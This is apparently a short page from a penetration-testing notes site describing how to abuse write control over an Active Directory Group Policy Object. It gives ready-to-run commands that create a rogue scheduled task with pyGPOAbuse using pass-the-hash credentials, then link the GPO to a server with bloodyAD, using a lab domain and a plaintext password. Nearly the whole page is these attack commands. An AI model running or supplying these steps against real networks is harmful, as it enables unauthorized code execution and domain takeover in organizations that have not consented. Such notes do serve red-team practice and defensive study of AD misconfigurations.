GPO (Group Policy Object)

When you own a object that owns a GPO, you can write to the GPO and link it in the domain.

Creating a rogue task for the GPO

  • You will need to find the GPO id (can be found in bloodhound)

  • You will need credentials for the user that controls the GPO

Using pyGPOabuse we can create a task for the GPO:

LogoGitHub - Hackndo/pyGPOAbuse: Partial python implementation of SharpGPOAbuseGitHub
python3 pygpoabuse.py powercorp.local/incendium -hashes :F0529918A0DE5B5B71AB9BBD915B1B01 -gpo-id 'D693F1E4-5666-4259-8BF1-E43CCE1D56F9' -f

Linking GPO

Now that we created a rogue task, we also need to link the GPO to objects. We can do this by remotely by using a Python3 script for example:

LogoGitHub - 1ncendium/pyGPO: Python class for managing Group Policy Object remotelyGitHub

Or we can use BloodyAD:

bloodyAD -d powercorp.local --host 10.10.1.128 -u incendium -p Incendium123 set object SRV01$ GPLink -v CN={2AADC2C9-C75F-45EF-A002-A22E1893FDB5},CN=POLICIES,CN=SYSTEM,DC=POWERCORP,DC=LOCAL
PreviousFile TransferNextTools

Last updated